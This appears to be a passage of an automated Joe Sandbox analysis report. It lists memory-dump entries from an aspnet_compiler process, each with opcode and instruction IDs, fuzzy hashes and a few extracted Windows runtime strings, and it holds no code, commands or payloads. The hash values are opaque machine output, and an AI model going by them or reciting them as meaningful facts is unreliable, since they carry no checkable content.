                                                                                                                                                          • Instruction Fuzzy Hash: 09513771E0021DAEDF11DFA9CC95AEFBBB8AB04754F100529EA51F7680D7309A05CBA0
                                                                                                                                                          Strings
                                                                                                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0105063D
                                                                                                                                                          • kLsE, xrefs: 01050540
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                          • API String ID: 0-2547482624
                                                                                                                                                          • Opcode ID: 1244f93ab665f0ba0910a5099a9e33be5313f78adc058ba071a01abfa8ad587b
                                                                                                                                                          • Instruction ID: 28609c039867cc99999874cdcc43b81ff7715d0a41bac8f2412fe61d4f97e5ee
                                                                                                                                                          • Opcode Fuzzy Hash: 1244f93ab665f0ba0910a5099a9e33be5313f78adc058ba071a01abfa8ad587b
                                                                                                                                                          • Instruction Fuzzy Hash: 0F51C0716047468FD7A4DF68C5406EBBBE4AF88304F10887EFAEA87245E770D545CBA2
                                                                                                                                                          Strings
                                                                                                                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 0105A2FB
                                                                                                                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 0105A309
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                          • API String ID: 0-2876891731
                                                                                                                                                          • Opcode ID: ecbec935d21afcf0486106db41c2fa7643cdaba7f2e23cf66738bb14e1856879
                                                                                                                                                          • Instruction ID: 7ea2d831d5aeb9e884be0ace286300fc0365940fde5f55bb51e3d743bbfe5301
                                                                                                                                                          • Opcode Fuzzy Hash: ecbec935d21afcf0486106db41c2fa7643cdaba7f2e23cf66738bb14e1856879
                                                                                                                                                          • Instruction Fuzzy Hash: E441BC31B00645DBDB51DF59C880BAE7BF4FF84304F1481A5ED84DB292E6B5EA40CB50
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID: Cleanup Group$Threadpool!
                                                                                                                                                          • API String ID: 2994545307-4008356553
                                                                                                                                                          • Opcode ID: df803da5f5bc5a9667b7a70cfee5b1040eae81e8e5b2cf2b17ec4ef9a33bd356
                                                                                                                                                          • Instruction ID: 32c6529f52a5601c8f6160b0bb6008bcb1c2825b89aadf92cffa742e61afd4f1
                                                                                                                                                          • Opcode Fuzzy Hash: df803da5f5bc5a9667b7a70cfee5b1040eae81e8e5b2cf2b17ec4ef9a33bd356
                                                                                                                                                          • Instruction Fuzzy Hash: 0201D1B2255700EFD311EF14CD45B6677E8E799B29F00893AA6D8CB594E334D814CB4A
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: MUI
                                                                                                                                                          • API String ID: 0-1339004836
                                                                                                                                                          • Opcode ID: d101df1c3e9da9fbf5190a925009729ea146e18bd94b8c522fd62afc54ef438d
                                                                                                                                                          • Instruction ID: 2c3765f20ff91b1c0bfea73d4fa6f6bcbbe6e2f4632edc65e9ce04a7a5ea6f04
                                                                                                                                                          • Opcode Fuzzy Hash: d101df1c3e9da9fbf5190a925009729ea146e18bd94b8c522fd62afc54ef438d
                                                                                                                                                          • Instruction Fuzzy Hash: 3A826E75E003198BEBA4CFA9C9847EEBBB5BF44310F1481AAED99AB251D7309D41CF50
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 0-3916222277
                                                                                                                                                          • Opcode ID: 8ef841030463be20dd2f30ef498d008e9a35c717a7b74e83830ed0a879e7c145
                                                                                                                                                          • Instruction ID: 902c6b6c2750dbb48ac6703629132cf6a9a3aa715d46f875ecff31cdfd820b9d
                                                                                                                                                          • Opcode Fuzzy Hash: 8ef841030463be20dd2f30ef498d008e9a35c717a7b74e83830ed0a879e7c145
                                                                                                                                                          • Instruction Fuzzy Hash: 74917271A00219AFEB21DF95CD85FEEBBB8EF18B50F104065F640AB194D775AD00CBA4
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 0-3916222277
                                                                                                                                                          • Opcode ID: f0b44135bb13ceebd3adb62a1190216dd17dde47e412198d68c4ed77228cec58
                                                                                                                                                          • Instruction ID: 0704e5a0a797339416a3cdb4d4fa3ca7175047a85d4fc3a1666c0fe664ea7d6f
                                                                                                                                                          • Opcode Fuzzy Hash: f0b44135bb13ceebd3adb62a1190216dd17dde47e412198d68c4ed77228cec58
                                                                                                                                                          • Instruction Fuzzy Hash: E691B035900209BFDB22ABA5DC49FEFBBB9FF85740F114029F685A7660E7359901CB90
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: GlobalTags
                                                                                                                                                          • API String ID: 0-1106856819
                                                                                                                                                          • Opcode ID: 240308b21ab23190b8e0019b4a99451caa1c6377c127ad84472fa467a45c8acc
                                                                                                                                                          • Instruction ID: 0cbccfbcfc06f9b28bfdc0d17181c146482ea069db67f55bb42554251034cdb4
                                                                                                                                                          • Opcode Fuzzy Hash: 240308b21ab23190b8e0019b4a99451caa1c6377c127ad84472fa467a45c8acc
                                                                                                                                                          • Instruction Fuzzy Hash: 33715BB5E0020A9FDB68DF98C5906EEBBF1BF48B00F14866EE585A7341E7368845CF50
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: .mui
                                                                                                                                                          • API String ID: 0-1199573805
                                                                                                                                                          • Opcode ID: 3e21a216338d08812014de8b4013c61d48c2f1ebbdc63a7f4d885887f856e5da
                                                                                                                                                          • Instruction ID: 12d365db5bfd969e8cfe2ea59d508267d9f2c0df3de25d13e9a13a5812e7e5ec
                                                                                                                                                          • Opcode Fuzzy Hash: 3e21a216338d08812014de8b4013c61d48c2f1ebbdc63a7f4d885887f856e5da
                                                                                                                                                          • Instruction Fuzzy Hash: 18518072D0022A9BDF14DF99D841AEFBBB4AF48A10F05416DEE91FB640D7389905CFA4
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: EXT-
                                                                                                                                                          • API String ID: 0-1948896318
                                                                                                                                                          • Opcode ID: e983f9522c9e2496ad76f8c89083691ab8014a019ccec467b0bc51d6df2c0dd4
                                                                                                                                                          • Instruction ID: f45f287e671cb41797f348f322daa909e7468a81d5fddd5df347c147b90f0a56
                                                                                                                                                          • Opcode Fuzzy Hash: e983f9522c9e2496ad76f8c89083691ab8014a019ccec467b0bc51d6df2c0dd4
                                                                                                                                                          • Instruction Fuzzy Hash: 9041A0765183129BD720DA75C884BAFBBECBF88714F040A6DFAC4D7180E678DA048796
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: BinaryHash
                                                                                                                                                          • API String ID: 0-2202222882
                                                                                                                                                          • Opcode ID: c5a2c0e38dd1cfdf3393c351944522af8a442cb12fe83bf36ffdeecae07a5141
                                                                                                                                                          • Instruction ID: 5cb84699eda81319d69e3ec83d81f65f8162d6b960b47af2fef7dd1661acbd90
                                                                                                                                                          • Opcode Fuzzy Hash: c5a2c0e38dd1cfdf3393c351944522af8a442cb12fe83bf36ffdeecae07a5141
                                                                                                                                                          • Instruction Fuzzy Hash: F54142B1D0112DAAEF21DB50CD84FDFB77CAB45B14F0045E9AA58AB140DB709E898FA4
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: #
                                                                                                                                                          • API String ID: 0-1885708031
                                                                                                                                                          • Opcode ID: cbeeee494291fd99710c0cbd70bf55c1564636a00172c7b678d26da408c4d471
                                                                                                                                                          • Instruction ID: 36eb16425dd80fd426cccf7392ad0753c58393f5de0b4577fbc032f2682bf635
                                                                                                                                                          • Opcode Fuzzy Hash: cbeeee494291fd99710c0cbd70bf55c1564636a00172c7b678d26da408c4d471
                                                                                                                                                          • Instruction Fuzzy Hash: D4312A31A0070D9FDB22CB6AD858BFE7BE8DF15704F104068E9819B282D776E855CB50
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: BinaryName
                                                                                                                                                          • API String ID: 0-215506332
                                                                                                                                                          • Opcode ID: 73c5bc8f21299c9c406876474374662bfcdad4058f43805985b35fa94bcdea71
                                                                                                                                                          • Instruction ID: 608a5b20b32da716586c77192042263a74e8895ed1f8e9859b598cf1449b9ac5
                                                                                                                                                          • Opcode Fuzzy Hash: 73c5bc8f21299c9c406876474374662bfcdad4058f43805985b35fa94bcdea71
                                                                                                                                                          • Instruction Fuzzy Hash: FC312536900519AFFB15DB98CA55EAFBBB4EF80B20F01416DE949A7250D7309E00EFE0
                                                                                                                                                          Strings
                                                                                                                                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 010D895E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                                          • API String ID: 0-702105204
                                                                                                                                                          • Opcode ID: d027af6a0a73057b2be741852d8616fc07d4ab81aba9f23eb4272479920aa3dc
                                                                                                                                                          • Instruction ID: 4757743e4159e3fa2a21d4c6934c39fd01bf3f15c1bf0a1b1d7943e3750c1e57
                                                                                                                                                          • Opcode Fuzzy Hash: d027af6a0a73057b2be741852d8616fc07d4ab81aba9f23eb4272479920aa3dc
                                                                                                                                                          • Instruction Fuzzy Hash: DA01F735200301ABE7686F55D884E9ABFA5EF85AA4B08006EF6C116552CB20A880C792
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: bd782eeaf2e8e42ffb25dbd101788b3f0c9783a88e6fa69f63261bf5dfa8077d
                                                                                                                                                          • Instruction ID: eb5b80b1495aa6dff5f5032df69529055f07ed4ada0491aeede8813c5b9c46f1
                                                                                                                                                          • Opcode Fuzzy Hash: bd782eeaf2e8e42ffb25dbd101788b3f0c9783a88e6fa69f63261bf5dfa8077d
                                                                                                                                                          • Instruction Fuzzy Hash: 3F42F1726083419BE765CF68C892AAFBBE5BF88300F08492DFBC287650D771D845CB52
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 10badda9e3c611f81858db9688e54cdf5ab92da5eb248aad7cc149d2fb6dfa43
                                                                                                                                                          • Instruction ID: 487efdc0b87e132039b13306d6772b3f863015c3afc7f9cca6d3e5ad85079a85
                                                                                                                                                          • Opcode Fuzzy Hash: 10badda9e3c611f81858db9688e54cdf5ab92da5eb248aad7cc149d2fb6dfa43
                                                                                                                                                          • Instruction Fuzzy Hash: A4423C75E002198FEB65CF69C845BADBBF5BF88300F14C19AE989EB241DB349985CF50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 07aadd62b7526894fd91253a834d911772e45302d87c81e1859bb02464fc94e5
                                                                                                                                                          • Instruction ID: d9aed19964f41009285cdbccd0d32b1cc70aef051aece19e59af3832df498c63
                                                                                                                                                          • Opcode Fuzzy Hash: 07aadd62b7526894fd91253a834d911772e45302d87c81e1859bb02464fc94e5
                                                                                                                                                          • Instruction Fuzzy Hash: 4B32DE70A0075A8BEB65CF69C8847FEBBF2BF84704F14416DD5C69B684DB36A842CB50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: fd7536d738b8353f39192d950fd3ed5898153d8703a9a28e860a6ac2af0615dc
                                                                                                                                                          • Instruction ID: 88b2033af6d4b405e8db421870b7a0612e8a91173dcd2f7968170e717f6c651d
                                                                                                                                                          • Opcode Fuzzy Hash: fd7536d738b8353f39192d950fd3ed5898153d8703a9a28e860a6ac2af0615dc
                                                                                                                                                          • Instruction Fuzzy Hash: 3B22BF74704651CAEB65CF2DC456776BBF1BF88340F08849DEACA8BA86D735E442CB60
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 36c271e595ed72e2fa76f05afe7f59244fcdcd430d496e31ff27549447bfbff3
                                                                                                                                                          • Instruction ID: 991647fd6fcfc94cffc3ed4152d9fea0179e2f7a811c9aa14cd18951223772b4
                                                                                                                                                          • Opcode Fuzzy Hash: 36c271e595ed72e2fa76f05afe7f59244fcdcd430d496e31ff27549447bfbff3
                                                                                                                                                          • Instruction Fuzzy Hash: 0832BF70A01205CFDBA5CF68D490BAEBBF1FF48300F5485A9E995AB391DB35E841CB90
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                                          • Instruction ID: ee0983b25c2fb3ee8930e904806fee938d989af9d7c04d8c6424b3d24392cf5f
                                                                                                                                                          • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                                          • Instruction Fuzzy Hash: 4AF17C70E0020A9BDB55DFA9C990BEEBBF5BF48310F088169E985EB240E774DC41CB64
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c5ca5ab6e72e7334b32e6d4f745712d48f1c041192ef7a6b3c600139fcf03832
                                                                                                                                                          • Instruction ID: 7bb27e223481dcd32f0258e6fe7eb77a30358f2dbf921e3e684cbe9de63ecfe2
                                                                                                                                                          • Opcode Fuzzy Hash: c5ca5ab6e72e7334b32e6d4f745712d48f1c041192ef7a6b3c600139fcf03832
                                                                                                                                                          • Instruction Fuzzy Hash: 64D1E271E0060A8FDF19CF5AC845AFEB7F5AF88304F18C16AD995A7241D735E905CB60
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 901cfcb76536a11a07c2503466c121fc5c18ce65ab267af747139bc98ebfc7a1
                                                                                                                                                          • Instruction ID: 9c3ef4c0a6876ac6ffc0a690fb321660b42579efa14b59e3c92b5bdb5ab6dc0f
                                                                                                                                                          • Opcode Fuzzy Hash: 901cfcb76536a11a07c2503466c121fc5c18ce65ab267af747139bc98ebfc7a1
                                                                                                                                                          • Instruction Fuzzy Hash: A6E17C715083468FC795CF28C090A6BBBF4BF89314F458AADE9D587351EB32E905CB92
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: a028099ca0ae63ee2955477cfbf299718418f9f8bbc9cb7e4d7847bf9493eeee
                                                                                                                                                          • Instruction ID: 4c94f3c937a0b1237ed5ed245da2a21dd79e73fb506f70dcaa382cd6a54c2c9f
                                                                                                                                                          • Opcode Fuzzy Hash: a028099ca0ae63ee2955477cfbf299718418f9f8bbc9cb7e4d7847bf9493eeee
                                                                                                                                                          • Instruction Fuzzy Hash: BED1E4B1A002069BDB14DFA8C8D0ABE77F5BF54304F058A7EE995DB281EB34D954CB50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                          • Instruction ID: ab7810ac2ef576514cd6e3b27a8a10bcad7e02cb246873b405f34918e81863ec
                                                                                                                                                          • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                          • Instruction Fuzzy Hash: 17B17274A007059FDB64DF99C940ABBBBF9BF84314F10C49EEA8297794DA34E905CB50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                          • Instruction ID: e20444d6d62bd018bad7311532f5ee68aa233e82268849c770bc0330997696bd
                                                                                                                                                          • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                          • Instruction Fuzzy Hash: 1CB1C631A04646AFDB15DB68C890BFEBBFAAF44300F140195E6D6DB286D730EE41CB90
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 483f635cef1dce2c793ea0e69b9f3399f36b18b2c39ea1542312986a0f549059
                                                                                                                                                          • Instruction ID: 46392016f6ad78f6e6ccdbe2f3ed56721df5c007ae11c049baa239459657460a
                                                                                                                                                          • Opcode Fuzzy Hash: 483f635cef1dce2c793ea0e69b9f3399f36b18b2c39ea1542312986a0f549059
                                                                                                                                                          • Instruction Fuzzy Hash: 14C149741083418FD7A4CF19C494BABB7E5BF88308F44896EE9D987291DB74E909CF92
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 54bcf169a7bb73cd1abbfa7c894b1e61ee092530ab74aeca0dbdba08b76180f8
                                                                                                                                                          • Instruction ID: 3680e630931b116038173d407adbfa03a68763a83d21383eeb0cc14c7ed4d26d
                                                                                                                                                          • Opcode Fuzzy Hash: 54bcf169a7bb73cd1abbfa7c894b1e61ee092530ab74aeca0dbdba08b76180f8
                                                                                                                                                          • Instruction Fuzzy Hash: BCB17370B002558BEB64DF68C990BADB3F5EF44700F0485E9D58AE7291DB319DC5CB60
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: eadc5fd82dfa71720216698471420563833293d68bdcaf0c122e72dd814955ff
                                                                                                                                                          • Instruction ID: 95aa13ca629ed596b8698c8899c4ff3d3c31fff8b9d0c9b31c0c2da1bdeca651
                                                                                                                                                          • Opcode Fuzzy Hash: eadc5fd82dfa71720216698471420563833293d68bdcaf0c122e72dd814955ff
                                                                                                                                                          • Instruction Fuzzy Hash: 27A12431E0125AAFEB21DB58CD84BEEBBF4BB04754F0401A5EAD0AB291D7749D80CBD5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 454be43a55d938da6a975ea56e8560a638cac5cdf44fad72805f36eb794fd16a
                                                                                                                                                          • Instruction ID: 114b17e82c43971de432ddc1fdc9d99b5ad4ac06a183cbe1c4fdb5094be24718
                                                                                                                                                          • Opcode Fuzzy Hash: 454be43a55d938da6a975ea56e8560a638cac5cdf44fad72805f36eb794fd16a
                                                                                                                                                          • Instruction Fuzzy Hash: 50A1E1B0B00616DBDF64DF69C8A0BAEB7F9FF54718F004069EA9597285DB34E841DB80
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 65a0d9b0c067ca4ff06b4620d110f3967ec552c75f5c72b6e1954f0aa322d09a
                                                                                                                                                          • Instruction ID: 842b9a25dae0c22c8b72762d507a9bb97fffeb2f18696107c58a62e3b2f5439f
                                                                                                                                                          • Opcode Fuzzy Hash: 65a0d9b0c067ca4ff06b4620d110f3967ec552c75f5c72b6e1954f0aa322d09a
